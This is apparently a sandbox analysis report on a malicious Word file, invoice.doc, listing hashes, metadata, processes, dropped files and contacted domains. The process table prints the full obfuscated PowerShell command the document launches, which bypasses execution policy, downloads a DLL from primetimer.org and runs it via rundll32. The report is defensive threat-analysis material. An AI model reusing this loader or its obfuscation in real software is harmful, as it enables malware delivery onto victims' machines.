File name: | invoice.doc |
Full analysis: | https://app.any.run/tasks/d6f50297-2505-4c78-bc90-31d6c4e2656f |
Verdict: | Malicious activity |
Analysis date: | November 08, 2018, 15:17:55 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Author: James Smith, Template: Normal.dotm, Last Saved By: Windows User, Revision Number: 3, Name of Creating Application: Microsoft Office Word, Total Editing Time: 01:00, Create Time/Date: Sun Nov 4 19:24:00 2018, Last Saved Time/Date: Wed Nov 7 02:32:00 2018, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0 |
MD5: | 1374457044433A7AD196C1E43ACB15C1 |
SHA1: | 98DC8E8DE4C6EC1E0F39331C68B2E89C8E86F6EE |
SHA256: | B84E2524F59F318D5F8BD01B4CCC38FBD691F382873892D5304D760FAF0064C7 |
SSDEEP: | 6144:vTGfXFMFu9mycXxnBWbtzcn3lgO4VoX9B38Js+:b41SyqxnBWb5cVgZaXv8 |
.doc | | | Microsoft Word document (80) |
---|
CompObjUserType: | ???????? Microsoft Office Word 97-2003 |
---|---|
CompObjUserTypeLen: | 39 |
HeadingPairs: |
|
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 12 |
CharCountWithSpaces: | 1 |
Paragraphs: | 1 |
Lines: | 1 |
Company: | - |
CodePage: | Windows Cyrillic |
Security: | None |
Characters: | 1 |
Words: | - |
Pages: | 1 |
ModifyDate: | 2018:11:07 02:32:00 |
CreateDate: | 2018:11:04 19:24:00 |
TotalEditTime: | 1.0 minutes |
Software: | Microsoft Office Word |
RevisionNumber: | 3 |
LastModifiedBy: | Windows User |
Template: | Normal.dotm |
Keywords: | - |
Author: | James Smith |
Subject: | - |
Title: | - |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
968 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\invoice.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | explorer.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Exit code: 0 Version: 14.0.6024.1000 | ||||
456 | "C:\Users\admin\AppData\Local\Temp\qgnrahnui3\chaua.exe" $egabmypniujouovq6='ui3''';$tgvlrpmueqmvflyoaiwf='path=($en';$yeaeeaujsosbuua1=';Se';$eqkzlkejvawpqpqifkaydwuyeda='org/Xk';$ndojlceoiuoierjerlaqgmby='t System';$cahaaiilusephaohps05='php'',f7f81a39-5f63-5b42-9efd-1f13b5431005#39;;$ouboyaeuycah='t-Execu';$gyvouelayafgarddzy1='ss; f7f81a39-5f63-5b42-9efd-1f13b5431005#39;;$aobdseetzparmarmuuwf='''\z';$baaxslplaidrvehoqaymk60='cy By';$bvfrepnjwjpusrjjrwiaoffsu='hwh';$euukejdtncnqojxaoi='.dll'');';$ooqqbuoifbiiy='dFile(';$qwlofnexwuaouioaufbw='data+';$btouqdroaktfhyqgpuyyy='.Web';$fbrnyieyuiauiz='pass -Sc';$icfraektfrylkacqgwzrgfmvmzn82='rahn';$pjblncsnvyllrba25='qQkPWluO.';$wyssfngydmdwbpbsmk='prime';$uvfhheooqeaztoeg='l32 $p';$emnhxakhvharrqeobntmjkoyijq='path);';$yyvjvzbdtjnzclrpwsbswryupx='tionPoli';$yeozwuhayiomqagwja0='Downloa';$qrrflzpgijzpwkbnfktoke='(New-Ob';$znrxaxsebqjulaixhoukvxu7='Item ';$yrmeeeisxltkamiaaltb='''http://';$ioynehfvdkjqjeocmbovrs='se -for';$vtuiqqbukzaurcups1='vyeo';$urllsrgiczilzrboaetgsxhknlp='client).';$kbyowbudphqaoulhuesjjtyls='.Net';$vgnynvatppveuey60='fhj''';$alcpfemwsvbctgtlmlajfuiuyeq='ath , ''';$yjuuicgzcweoiut='f1'';Rem';$yyvcnzapjqjfxndzlldwattao='p + ''\qgn';$akouyyojompjrab='($env:tem';$mrdpdblcakqfyuydixminu05='$hj = ''';$zoflvqquooeyzilbiiqpouzlo=') -recur';$uerehhhpiebylwuauia='ove-';$micvzqjnkskthioyoskdqo='timer.';$rbkdlyuoterlqhiutjloe='v:app';$otruaanwcoaxmsxp=' rundl';$pxilntduusvjguyabvodpy='ope Proce';$aeaktrrowacvjlzyabew='ce;';$iaolcifsdafiuoesiyj='jec'; Invoke-Expression ($mrdpdblcakqfyuydixminu05+$bvfrepnjwjpusrjjrwiaoffsu+$vgnynvatppveuey60+$yeaeeaujsosbuua1+$ouboyaeuycah+$yyvjvzbdtjnzclrpwsbswryupx+$baaxslplaidrvehoqaymk60+$fbrnyieyuiauiz+$pxilntduusvjguyabvodpy+$gyvouelayafgarddzy1+$tgvlrpmueqmvflyoaiwf+$rbkdlyuoterlqhiutjloe+$qwlofnexwuaouioaufbw+$aobdseetzparmarmuuwf+$vtuiqqbukzaurcups1+$euukejdtncnqojxaoi+$qrrflzpgijzpwkbnfktoke+$iaolcifsdafiuoesiyj+$ndojlceoiuoierjerlaqgmby+$kbyowbudphqaoulhuesjjtyls+$btouqdroaktfhyqgpuyyy+$urllsrgiczilzrboaetgsxhknlp+$yeozwuhayiomqagwja0+$ooqqbuoifbiiy+$yrmeeeisxltkamiaaltb+$wyssfngydmdwbpbsmk+$micvzqjnkskthioyoskdqo+$eqkzlkejvawpqpqifkaydwuyeda+$pjblncsnvyllrba25+$cahaaiilusephaohps05+$emnhxakhvharrqeobntmjkoyijq+$otruaanwcoaxmsxp+$uvfhheooqeaztoeg+$alcpfemwsvbctgtlmlajfuiuyeq+$yjuuicgzcweoiut+$uerehhhpiebylwuauia+$znrxaxsebqjulaixhoukvxu7+$akouyyojompjrab+$yyvcnzapjqjfxndzlldwattao+$icfraektfrylkacqgwzrgfmvmzn82+$egabmypniujouovq6+$zoflvqquooeyzilbiiqpouzlo+$ioynehfvdkjqjeocmbovrs+$aeaktrrowacvjlzyabew); | C:\Users\admin\AppData\Local\Temp\qgnrahnui3\chaua.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2424 | "C:\Windows\system32\rundll32.exe" C:\Users\admin\AppData\Roaming\zvyeo.dll f1 | C:\Windows\system32\rundll32.exe | — | chaua.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows host process (Rundll32) Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3048 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\invoice.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | explorer.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Exit code: 0 Version: 14.0.6024.1000 | ||||
3808 | "C:\Windows\explorer.exe" | C:\Windows\explorer.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Explorer Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
1604 | C:\Windows\Explorer.EXE | C:\Windows\explorer.exe | — | — |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Explorer Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
328 | "C:\Windows\system32\NOTEPAD.EXE" C:\Users\admin\AppData\Local\Temp\qgnrahnui3\WSMan.Format.ps1xml | C:\Windows\system32\NOTEPAD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Notepad Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2644 | "C:\Windows\system32\NOTEPAD.EXE" C:\Users\admin\AppData\Local\Temp\qgnrahnui3\Certificate.format.ps1xml | C:\Windows\system32\NOTEPAD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Notepad Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
700 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\invoice.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | explorer.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3416 | "C:\Windows\explorer.exe" | C:\Windows\explorer.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Explorer Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
968 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRA285.tmp.cvr | — | |
MD5:— | SHA256:— | |||
1604 | explorer.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\invoice.doc.lnk | lnk | |
MD5:2690A5681567DDF993C464B15B242847 | SHA256:4B56B17C8BE26FB9D7997CD5AA55F10814890EF4B3CFF8A6D5B84199812FB875 | |||
968 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\invoice.doc.LNK | lnk | |
MD5:670E13493ECC1107BEDE395807B735EC | SHA256:8DC0C30BDAD2E63C836EBD9C88E6F5292AAAE04C8D9D4D26DE4D9172C4FAE9D8 | |||
968 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\qgnrahnui3\CompiledComposition.Microsoft.PowerShell.GPowerShell.dll | executable | |
MD5:A84B6952AB6A297CCE6C085FA8AB06CB | SHA256:54E3F8199D5C749920A2826C63D7C5E7E86D94874ADDCFD5C9B430671031017D | |||
968 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat | text | |
MD5:500A1C0AB1A05201CE7A192CDAABCA55 | SHA256:E7DE924E3C3BFFF39C6664F77C25DE7E4F48206DCE9919BDB34F449698DD640B | |||
1604 | explorer.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\a7bd71699cd38d1c.automaticDestinations-ms | automaticdestinations-ms | |
MD5:39B942AAF6246EE3F59E89E4623FD344 | SHA256:AFC0B10BC338D9EF71151B91DDB11F8E6012D52B617423E9C9D7E009D35521B4 | |||
968 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\qgnrahnui3\Diagnostics.Format.ps1xml | text | |
MD5:FF6EEB8125B9265C5BA40AF9F7C6F6BC | SHA256:7D569C1155CFA9B7BB2BA225EE409A55C8B0E8217F3A7E05BAA39DA1BD7C4689 | |||
968 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\qgnrahnui3\Certificate.format.ps1xml | xml | |
MD5:C93A361112351B30E2C959E72789952D | SHA256:4379BD59C1328A6811584D424DF3DC193A5D607E2859D3AC1655B9124A5F100D | |||
1604 | explorer.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\1b4dd67f29cb1962.automaticDestinations-ms | automaticdestinations-ms | |
MD5:1F20E3676DBF3F0C1B16F8D2BE33E0A4 | SHA256:3FA5AB55980D83E2B4879B0F1C8AECEC124F7E76490D0AFFFEF99373C25C2C49 | |||
968 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:59131AE46194C72AAA2801E1AD2642A0 | SHA256:32C5BFAA5D065DD7FD36D9AD6A40361A8160F42BB4F98F164D4D8BCB0E92CEE3 |
Domain | IP | Reputation |
---|---|---|
primetimer.org |
| malicious |
dns.msftncsi.com |
| shared |